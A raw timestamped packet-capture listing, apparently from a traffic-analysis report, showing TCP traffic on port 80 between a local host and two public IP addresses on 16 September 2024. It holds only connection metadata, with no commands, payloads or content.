                                  Sep 16, 2024 09:32:19.752955914 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.752968073 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.752978086 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.752990007 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753000975 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753012896 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753042936 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753042936 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753088951 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753088951 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753393888 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753403902 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753417015 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753443956 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753454924 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753454924 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753464937 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753479958 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753563881 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753761053 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753804922 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753814936 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753879070 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753889084 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753892899 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753905058 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753921986 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753933907 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753943920 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.753950119 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753950119 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.753957987 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754020929 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.754020929 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.754020929 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.754595041 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754606009 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754617929 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754705906 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.754705906 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.754738092 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754749060 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754760027 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754770994 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754781961 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754790068 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.754792929 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754805088 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754816055 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.754817963 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.754825115 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.755048990 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.755553961 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755563974 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755573034 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755616903 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755628109 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755637884 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755642891 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.755650043 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755685091 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755696058 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755706072 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755712986 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.755717993 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.755903959 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.756474972 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756485939 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756496906 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756539106 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756550074 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756560087 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756565094 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.756565094 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.756572962 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756583929 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.756584883 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756597042 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756607056 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756616116 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:19.756618977 CEST805583844.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:19.756719112 CEST5583880192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:20.761208057 CEST5583980192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:20.766190052 CEST805583944.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:20.766278028 CEST5583980192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:20.776063919 CEST5583980192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:20.781250954 CEST805583944.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:22.289525986 CEST5583980192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:22.294733047 CEST805583944.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:22.294804096 CEST5583980192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:23.309503078 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:23.314992905 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.322047949 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:23.331491947 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:23.337088108 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.337102890 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.337111950 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.337121010 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.337186098 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.337194920 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.337204933 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.337213039 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:23.337320089 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.540472984 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.541198015 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.541234016 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.541248083 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.541269064 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.541327953 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.559808969 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.559875011 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.559920073 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.559925079 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.559957981 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.559988976 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.560005903 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.560020924 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.560055017 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.560067892 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.560683966 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.560730934 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.560743093 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.561512947 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.561570883 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.630548000 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.630640030 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.630671024 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.630706072 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.630701065 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.630767107 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.650412083 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.650485992 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.650547981 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.650571108 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.650604963 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.650639057 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.650650024 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.650672913 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.650733948 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.651376009 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.651464939 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.651498079 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.651506901 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.651531935 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.651577950 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.652368069 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.652400970 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.652432919 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.652442932 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.652467012 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.652504921 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.653296947 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.653331041 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.653362989 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.653368950 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.653397083 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.653443098 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.654231071 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.654263973 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.654298067 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.654309034 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.654330969 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.654370070 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.721338034 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.721391916 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.721426964 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.721443892 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.721476078 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.721510887 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.721514940 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.741333961 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741384983 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741384029 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.741417885 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741451979 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741456985 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.741485119 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741518974 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741523981 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.741795063 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741827011 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741837025 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.741859913 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741892099 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.741903067 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.742342949 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.742376089 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.742415905 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.742424011 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.742456913 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.742470026 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.742489100 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.742521048 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.742527008 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.743235111 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.743283987 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.743304014 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.743336916 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.743367910 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.743381977 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.743417978 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.743453026 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.743493080 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.744247913 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.744292021 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.744296074 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.744329929 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.744359970 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.744375944 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.744393110 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.744425058 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.744436026 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.745074987 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.745121956 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.745125055 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.745157003 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.745188951 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.745193005 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.745220900 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.745254040 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.745255947 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.745981932 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.746027946 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.746033907 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.746082067 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.746113062 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.746121883 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.746145964 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.746186972 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.836532116 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.951863050 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951891899 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951904058 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951914072 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951925039 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951922894 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.951936007 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951946020 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951958895 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951968908 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951980114 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.951992035 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952003002 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952003956 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952003956 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952003956 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952011108 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952043056 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952043056 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952052116 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952064037 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952064037 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952064037 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952075005 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952085018 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952094078 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952095985 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952105999 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952116013 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952126980 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952128887 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952128887 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952137947 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952147961 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952157021 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952157021 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952159882 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952182055 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952183008 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952183008 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952192068 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952203035 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952203989 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952213049 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952224016 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952236891 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952240944 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952250957 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952261925 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952272892 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952274084 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952274084 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952281952 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952292919 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952299118 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952302933 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952313900 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952325106 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.952330112 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952348948 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.952378035 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955449104 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955460072 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955470085 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955481052 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955490112 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955491066 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955506086 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955517054 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955517054 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955528021 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955535889 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955538988 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955549002 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955555916 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955560923 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955570936 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955575943 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955580950 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955591917 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955595016 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955602884 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955610991 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955615044 CEST805584044.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:24.955651999 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:24.955666065 CEST5584080192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:25.855026960 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:25.860193014 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:25.861659050 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:25.868325949 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:25.873223066 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:27.014731884 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:27.034292936 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:27.034377098 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:27.038198948 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:27.038198948 CEST5584180192.168.2.444.213.25.70
                                  Sep 16, 2024 09:32:27.043164968 CEST805584144.213.25.70192.168.2.4
                                  Sep 16, 2024 09:32:40.143505096 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:40.148439884 CEST80558423.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:40.148535013 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:40.161334038 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:40.166169882 CEST80558423.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:41.543287992 CEST80558423.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:41.543378115 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:41.667515039 CEST5584280192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:41.672462940 CEST80558423.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:42.683867931 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:42.689117908 CEST80558433.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:42.689194918 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:42.702240944 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:42.707187891 CEST80558433.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:43.154696941 CEST80558433.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:43.155592918 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:44.211699009 CEST5584380192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:44.216808081 CEST80558433.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.231544018 CEST5584480192.168.2.43.33.130.190
                                  Sep 16, 2024 09:32:45.236901999 CEST80558443.33.130.190192.168.2.4
                                  Sep 16, 2024 09:32:45.237023115 CEST5584480192.168.2.43.33.130.190
